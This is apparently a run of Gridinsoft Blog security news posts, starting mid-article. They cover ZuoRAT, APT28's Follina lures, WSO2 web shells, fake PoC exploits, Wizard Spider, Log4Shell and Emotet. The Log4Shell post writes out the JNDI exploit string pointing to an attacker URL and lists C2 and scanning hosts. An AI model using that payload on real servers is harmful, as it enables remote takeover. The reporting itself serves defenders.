The researchers write that the complexity of this targeted campaign, as well as the tactics and methods of “work” of the attackers, indicate that some government hackers are behind ZuoRAT.

Recall that we also wrote that Trojan Qbot Took Advantage of the Famous Follina Vulnerability, and also that Trojan Source attack is dangerous for compilers of most programming languages.

As noted above, the start of this campaign coincided with the widespread shift to remote work following the beginning of the COVID-19 pandemic, which has dramatically increased the number of routers (including Asus, Cisco, DrayTek and NETGEAR devices) used by employees to access corporate networks remotely.

Hackers gained initial access to routers by looking for known unpatched vulnerabilities, which were then used to download a remote access tool. Having gained access to the network, the attackers delivered to the victim the shellcode loader for the next stage of the attack, which had already been used to provide Cobalt Strike and custom backdoors, including CBeacon and GoBeacon, which were capable of executing arbitrary commands.

The researchers say that the malware of this hacking group is capable of conducting in-depth surveys of the target network, collecting traffic, intercepting network communications, and generally describe the malware as a heavily modified version of the well-known Mirai malware.

Also, the malware has an active function of collecting TCP connections through ports 21 and 8443, which are associated with FTP and web browsing, potentially allowing you to monitor the victim’s Internet activity behind a compromised router.

Other ZuoRAT features include features for monitoring DNS and HTTPS traffic. This is done to intercept requests and redirect victims to malicious domains using predefined rules that are generated and stored in temporary directories.

ZuoRAT also allowed hackers to move further along the victim’s network to compromise other devices and deploy additional payloads (such as Cobalt Strike beacons). During such attacks, the already mentioned CBeacon and GoBeacon Trojans were used.

At the same time, hackers took various steps to hide their actions. For example, behind the attacks was a complex, multi-layered C&C infrastructure that included using a virtual private server to propagate the initial RAT exploit, as well as the use of the compromised routers themselves as C&C proxies.

The researchers note that, like most router malware, ZuoRAT does not survive reboots. A simple restart of the infected device will remove the original ZuoRAT exploit stored in the temporary directory. However, to fully restore infected devices, experts advise performing a factory reset. It is also emphasized that devices connected to a hacked router may already be infected with other malware, and it will be impossible to cure them just as quickly.

The post ZuoRAT Trojan Hacks Asus, Cisco, DrayTek and NETGEAR Routers appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Chinese Hacker Group Revealed after a Decade of Undetected Espionage, and also that Chinese Hackers Attack 0-day Follina Vulnerability.

Analysts write that the use of ransomware in spying campaigns allows hiding traces, complicate the attribution of attacks and distracts the attention of IT specialists of the victim company. In addition, in this way the theft of confidential information is disguised as financially motivated attacks.

A similar disguising method is practiced by Bronze Riverside (APT41) and Bronze Starlight (APT10). Both use the HUI loader to deploy remote access Trojans, PlugX, Cobalt Strike, and QuasarRAT.

Starting in March 2022, the Bronze Starlight group used Cobalt Strike to deploy ransomware (including LockFile, AtomSilo, Rook, Night Sky, and Pandora) on their victims’ networks, according to researchers. These attacks also used a new version of the HUI loader, which is able to intercept Windows API calls and disable Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI).

Studying the configuration of Cobalt Strike beacons in three different attacks using AtomSilo, Night Sky, and Pandora malware revealed a common control server address for them. It is also noted that this year the same source was used to upload samples of the HUI bootloader on Virus Total.

It is noted that in the studied cases, the activity of LockFile, AtomSilo, Rook, Night Sky and Pandora was unusual when compared with ordinary financially motivated ransomware attacks. So, the attacks were aimed at a small number of victims, lasted a short period of time, and then the hackers completely abandoned the project and moved on to the next one.

Secureworks writes that Pandora and the latest version of the HUI loader have code similarities. LockFile and AtomSilo also look similar, while Night Sky, Pandora, and Rook are based on the Babuk malware source code, but also have a lot in common.

Experts summarize that Bronze Starlight clearly has no difficulty creating short-lived ransomware variants that are only needed to disguise spying operations as ransomware attacks and complicate attribution. The fact is that the studied ransomware is based on publicly available or leaked source code, and Chinese hackers are known for willingly sharing tools and infrastructure with each other. That is, in such cases it is extremely difficult to track attribution, possible connections, and speak with confidence about any conclusions.

The post Chinese Hackers Use Ransomware As a Cover for Espionage appeared first on Gridinsoft Blog.

According to experts, the APT28 hacker group (Strontium, Fancy Bear and Sofacy) sends out emails with a malicious document called “Nuclear Terrorism Is a Real Threat.rtf”.

The hackers chose this topic to encourage the recipient to open the document, as fear of a potential nuclear attack is common among Ukrainians.

Let me remind you that we reported that Hacker groups split up: some of them support Russia, others Ukraine, and also that War in Ukraine triggered a Stream of amateurish ransomware.

The RTF document exploits the CVE-2022-30190 (Follina) vulnerability to download and run the CredoMap malware (docx.exe) on the victim’s device.

According to a Malwarebytes report, the payload is an infostealer that steals credentials and cookies from Chrome, Edge, and Firefox browsers. The software then extracts the stolen data using the IMAP email protocol and sends everything to the C2 address, which is hosted on an abandoned site in Dubai.

CERT-UA also identified another attacker campaign called UAC-0098 using CVE-2022-30190.

CERT-UA reported that the threat actor used a DOCX file named “Penalty.docx” and the payload was received from the remote resource is a Cobalt Strike beacon (ked.dll) with the latest compilation date.

The e-mails sent out allegedly come from the State Tax Service of Ukraine.

Due to Russia’s invasion of Ukraine, many citizens have temporarily stopped paying taxes to the state, so the bait can be effective against many Ukrainians.

CERT-UA advised employees of organizations to remain vigilant about phishing emails as the number of spear phishing attacks remains high.

The post Russian Hackers Use Follina Vulnerability to Attack Users in Ukraine appeared first on Gridinsoft Blog.

This vulnerability allows attackers to execute malicious code remotely via unhindered file uploading.

The scheme of the attack begins with web shell installation through *.jsp or *.war files upload taking advantage of the CVE-2022-29464 vulnerability. As the web shell is installed, the attacker executes an arbitrary Java process with its help.

RELATED: Microsoft warns of growing number of attacks using web shells.

The results of the attack are the installation of a coin miner and Cobalt Strike beacon (backdoor.) The cryptocurrency miner is installed via the Java-process-launched wget command that installs the auto.sh file (the miner itself.) In the meantime, another part of the attack happens, also via the web shell. Java process calls a chmod command that modifies permissions to make it possible to run the process entitled “LBcgqCymZQhm” all through the same Java process. The process establishes an outbound connection to an IP address 179[.]60[.]150[.]29[.]4444, earlier tracked as a location involved in numerous Cobalt Strike attacks. Therefore, the LBcgqCymZQhm process is a Cobalt Strike backdoor beacon.

The most interesting thing is that the Cobalt Strike beacon, initially designed for Windows, turned out to be working on Linux during these attacks. That means the hackers have purposefully worked upon the backdoor’s compatibility with Linux.

The vulnerable software includes WSO2 API Manager 2.2.0 and above, Identity Server 5.2.0 and above, Identity Server Analytics 5.4.0 -5.6.0, Identity Server as a Key Manager 5.3.0 and above, Open Banking AM 1.4.0 and above, and Enterprise Integrator 6.2.0 and above. The patch is already there, so all users of the mentioned programs are advised to patch the flaws in question ASAP.

The multiple WSO2 clients belong to many industries, vital ones included. For example, healthcare, financial sector, energy, education, communications, and government. Needless to say, should the hackers exploit the CVE-2022-29464 vulnerability against unpatched systems, the consequences of the attack could be drastic.

The post A WSO2 Vulnerability is Fraught with Remote Code Execution appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Emotet now installs Cobalt Strike beacons.

Cyble analysts report that malware disguised as PoC exploits for a pair of Windows vulnerabilities (CVE-2022-24500 and CVE-2022-26809) recently appeared on GitHub, which Microsoft patched as part of the April “update Tuesday”.

Fake exploits were published in the repositories of the user rkxxz, which have now been deleted along with the account itself. As always happens after the publication of PoC exploits, the news quickly spread on Twitter and even attracted the attention of attackers on hacker forums.

You might also be curious to know what Cybersecurity Experts Analyzed the Methods of a Group of Russian Hackers Wizard Spider.

And it soon became clear that the exploits were actually fake, and Cobalt Strike beacons were installed on people’s devices. Cyble analysts have taken a closer look at the fake PoCs and found that they are written in .NET and pretend to exploit the IP address, in fact infecting users with a backdoor.

The deobfuscated exploit sample showed that the fake PoC runs a PowerShell script that executes another gzip-compressed PowerShell script (VirusTotal) to inject the beacon into memory.

The researchers note that this is not the first case of targeted attacks on cybersecurity experts. The fact is that by attacking members of the cybersecurity community, in theory, attackers not only gain access to data on vulnerability research (which the victim can work on), but can also gain access to the network of a cybersecurity company. And this can be a real gold mine for hackers.

Cobalt Strike is a legitimate commercial tool built for pentesters and red teams and focused on operations and post-operations. Unfortunately, it has long been loved by hackers ranging from government APT groups to ransomware operators.

Although the tool is not available to ordinary users, attackers still find ways to use it (for example, rely on old, pirated, hacked and unregistered versions).

The post Fake Exploits Used to Deliver Cobalt Strike Beacons appeared first on Gridinsoft Blog.

The Wizard Spider group, possibly of Russian origin, manages an infrastructure of “a complex set of sub-commands and groups, controls a huge number of hacked devices, and uses a highly developed workflow to ensure security and a high pace of work.”

Let me remind you that we also reported that Leaked Conti ransomware source codes were used to attack Russian authorities, and also that State Department Offers $1 million for Info on Russian Hackers.

Now various cybercriminal campaigns often use a business model that includes hiring the best specialists and creating a financial basis for depositing, transferring and laundering proceeds to make a profit or work in the interests of the state. Wizard Spider, according to this model, invests part of the profits in development by investing in tools, software and hiring new specialists. According to the report, the group owns “hundreds of millions of dollars in assets.”

Wizard Spider focuses on compromising corporate networks and “has a significant presence in nearly every developed country in the world, as well as many emerging economies.” The group’s victims include defense firms, corporate firms, equipment suppliers, hospitals and infrastructure companies.

Wizard Spider attacks start with spam and phishing using QBot and SystemBC proxy. The group can also infiltrate the business through compromised email between employees in BEC (Business Email Compromise, BEC) schemes.

After gaining access to the system, the group can deploy Cobalt Strike and attempt to gain domain administrator rights. Once the Conti malware is deployed and the computers and hypervisor servers are encrypted, the hacker can demand a ransom from the victim. Compromised devices are managed through the control panel.

Wizard Spider uses VPNs and proxy servers to hide its tracks. The group has invested in VoIP systems and employees who call victims and intimidate them into paying a ransom.

The Sekhmet, Maze, and Ryuk groups have used such scare tactics in the past. Coveware suspects that such “call center” work could be outsourced to cybercriminals, as the templates and scripts used are often the same.

Another notable tool is the Wizard Spider hack station. A special set stores cracked hashes and launches attackers to pick up domain credentials and other forms of hashes.

The station also informs the team on the status of the hack. There are currently 32 active station users. Also, several servers were found containing a cache with tactics, methods, exploits, information about crypto wallets and encrypted ZIP files with notes of attacking groups.

The post Cybersecurity Experts Analyzed the Methods of a Group of Russian Hackers Wizard Spider appeared first on Gridinsoft Blog.

The vulnerability is already being exploited to deploy miners, Cobalt Strike beacons, etc.

An issue in the popular Log4j logging library included in the Apache Logging Project was reported last week. The 0-day vulnerability received the identifier CVE-2021-44228 and scored 10 out of 10 points on the CVSS vulnerability rating scale, as it allows remote arbitrary code execution (RCE).

The problem is aggravated by the fact that PoC exploits have already appeared on the network, and the vulnerability can be exploited remotely, which does not require advanced technical skills.

The vulnerability forces Java-based applications and servers that use the Log4j library to log a specific line to their internal systems. When an application or server processes such logs, a string can cause the vulnerable system to load and run a malicious script from the domain controlled by the attacker. The result will be a complete hijacking of the vulnerable application or server.

Let me remind you that the patch has already been released as part of the 2.15.0 release.

The attacks on Log4Shell have already begun, Bleeping Computer now reports. The publication says that to exploit the bug. An attacker can change the user agent of his browser and visit a specific site or search for a string on the site using the format ${jndi:ldap://[attacker_URL]}.

This will eventually add a line to the web server’s access logs, and when the Log4j application parses these logs and finds the line, an error will force the server to execute a callback or request the URL specified in the JNDI line. Attackers can then use this URL to send commands to the vulnerable device (either Base64 encoded or Java classes).

Worse, simple pushing of a connection can be used to determine if a remote server is vulnerable to Log4Shell.

It is reported that attackers are already using Log4Shell to execute shell scripts that download and install various miners. In particular, the hackers behind the Kinsing malware and the botnet of the same name actively abuse the Log4j bug and use Base64 payloads that force the vulnerable server to download and execute shell scripts. The script removes the competing malware from the vulnerable device and then downloads and installs the Kinsing malware, which will start mining the cryptocurrency.

In turn, Chinese experts from Netlab 360 warn that the vulnerability is being used to install Mirai and Muhstik malware on vulnerable devices. These IoT threats make vulnerable devices part of botnets, use them to extract cryptocurrency, and conduct large-scale DDoS attacks.

According to Microsoft analysts, a vulnerability in Log4j is also used to drop Cobalt Strike beacons. Initially, Cobalt Strike is a legitimate commercial tool created for pen-testers and red teams focused on exploitation and post-exploitation. Unfortunately, it has long been loved by hackers, from government APT groups to ransomware operators.

So far, there is no evidence to guarantee that the ransomware has adopted an exploit for Log4j. Still, according to experts, deploying Cobalt Strike beacons indicates that such attacks are inevitable.

Also, in addition to using Log4Shell to install various malware, attackers use the problem to scan vulnerable servers and obtain information from them. For example, the exploit shown below can force vulnerable servers to access URLs or perform DNS lookups for callback domains. This allows information security specialists and hackers to determine if a server is vulnerable and use it for future attacks, research, or trying to get a bug bounty from its owners.

Journalists are concerned that some researchers may go too far by using an exploit to steal environment variables that contain server data, including the hostname, username under which the Log4j service runs, OS information, and OS version number.

The most common domains and IP addresses used for these scans are:

• interactsh.com
• burpcollaborator.net
• dnslog.cn
• bin${upper:a}ryedge.io
• leakix.net
• bingsearchlib.com
• 205.185.115.217:47324
• bingsearchlib.com:39356
• canarytokens.com

The post Experts are already fixing attacks on the Log4Shell vulnerability appeared first on Gridinsoft Blog.

Let me remind you that usually Emotet installs TrickBot or Qbot malware on the victim’s machines, and that one already deploys Cobalt Strike and performs other malicious actions. Now, the Cryptolaemus research group has warned that Emotet skips the installation of TrickBot or Qbot and directly installs Cobalt Strike beacons on infected devices.

Cryptolaemus is a group of more than 20 information security specialists from all over the world, who united back in 2018 for a common goal – to fight against Emotet malware.

This information was confirmed to the journalists of Bleeping Computer by the specialists of the information security company Cofense.

While Cobalt Strike was trying to contact the lartmana[.]сom domain, and shortly thereafter, Emotet was deleting the Cobalt Strike executable.”

In fact, this means that attackers now have immediate access to the network for lateral movement, data theft, and rapid ransomware deployment. The rapid deployment of Cobalt Strike is expected to speed up the deployment of ransomware on compromised networks as well.

Cofense experts, in turn, report that it is not yet clear whether what is happening is a test of the Emotet operators themselves, or if it is part of a chain of attacks by another malware that cooperates with the botnet.

Let me remind you that I also reported that Trojan Emotet is trying to spread through available Wi-Fi networks.

The post Emotet now installs Cobalt Strike beacons appeared first on Gridinsoft Blog.